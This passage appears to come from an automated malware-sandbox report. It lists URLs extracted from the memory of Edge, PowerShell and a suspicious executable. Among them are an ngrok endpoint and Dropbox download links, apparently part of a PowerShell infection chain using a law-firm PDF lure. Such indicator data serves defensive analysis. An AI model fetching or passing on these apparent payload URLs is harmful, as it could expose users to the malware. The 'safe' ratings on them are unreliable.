                                                                                                https://anglebug.com/7246msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.dropbox.compowershell.exe, 00000003.00000002.2407724341.000001DD44D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D25E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://anglebug.com/7369msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2407724341.000001DD44BF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://anglebug.com/7489msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2407724341.000001DD44BF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://chrome.google.com/webstoremsedge.exe, 00000005.00000002.2401220812.000009BC0000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.2504789815.000049D004588000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://contoso.com/Iconpowershell.exe, 00000003.00000002.2469476777.000001DD54A3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://crl.ver)svchost.exe, 00000006.00000002.3353815451.00000172BE200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://issuetracker.google.com/161903006msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2407724341.000001DD44BF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://docs.sandbox.google.com/document/fsip/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://anglebug.com/3078msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://anglebug.com/7553msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://anglebug.com/5375msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://anglebug.com/5371msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://permanently-removed.invalid/OAuthLoginImsedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://anglebug.com/4722msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://chrome.google.com/webstoreImsedge.exe, 00000016.00000002.2504789815.000049D004588000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://permanently-removed.invalid/LogoutYxABmsedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://www.google.com/recaptcha/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://anglebug.com/7556msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://chromewebstore.google.com/msedge.exe, 00000005.00000002.2401220812.000009BC0000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.2504789815.000049D004588000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://dl-web.dropbox.com/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://app.hellofax.com/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://cfl.dropboxstatic.com/static/powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.macromedia.com/support/flashplayer/sys/1718218388.exe, 1718218388.exe, 0000001C.00000000.2702223771.000000000053D000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000005.00000003.2314596681.000009BC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2314749088.000009BC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2451974391.000049D004678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452990170.000049D004680000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.2452558949.000049D00467C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://anglebug.com/6692msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://issuetracker.google.com/258207403msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://uc6ccdf232c29353fe2809810043.dl.dropboxusercontent.compowershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://%shttp://a.SharedObject.BadPersistencependingSharedObject.UriMismatch1718218388.exe, 0000001B.00000002.2753649067.0000000002550000.00000004.00001000.00020000.00000000.sdmp, 1718218388.exe, 0000001B.00000000.2531449583.000000000053D000.00000002.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001B.00000002.2752586158.000000000053D000.00000002.00000001.01000000.0000000F.sdmp, 1718218388.exe, 0000001C.00000000.2702223771.000000000053D000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://anglebug.com/3502msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://anglebug.com/3623msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.hellofax.com/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://anglebug.com/3625msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://anglebug.com/3624msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://anglebug.com/5007msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://anglebug.com/3862msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a-UseBapowershell.exe, 00000003.00000002.2406948131.000001DD429E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407498129.000001DD42D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2482586387.000001DD5CAD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407651705.000001DD44680000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://anglebug.com/4836msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://issuetracker.google.com/issues/166475273msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://instructorledlearning.dropboxbusiness.com/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://www.dropbox.com/pithos/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://sales.dropboxbusiness.com/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://msn.com/msedge.exe, 00000005.00000002.2402463079.000009BC003A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.2505094868.000049D004700000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://anglebug.com/4384msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://a.sprig.com/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.dropbox.com/encrypted_folder_download/service_worker.jspowershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.com/cd/0/get/CgBJN8EsfGTe3jsM3L3IkAoL9wJSpowershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://anglebug.com/3970msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://www.dropbox.com/static/api/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://docsend.com/powershell.exe, 00000003.00000002.2407724341.000001DD44D7F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44D66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2C5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2BE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2537284093.00000293D2B9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://anglebug.com/7604msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://anglebug.com/7761msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://anglebug.com/7760msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://anglebug.com/5901msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://anglebug.com/3965msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://anglebug.com/6439msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://anglebug.com/7406msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://anglebug.com/7161msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://anglebug.com/7162msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppupowershell.exe, 00000010.00000002.2534975024.00000293D0190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2536989756.00000293D0420000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.2407724341.000001DD45E29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD4696C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2407724341.000001DD46946000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://ucf3844d75e14616ab432386c10a.dl.dropboxusercontent.compowershell.exe, 00000003.00000002.2407724341.000001DD44DFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                              http://anglebug.com/5906msedge.exe, 00000005.00000003.2316440045.000009BC0039C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                http://anglebug.com/2517msedge.exe, 00000005.00000003.2315328453.000009BC00378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
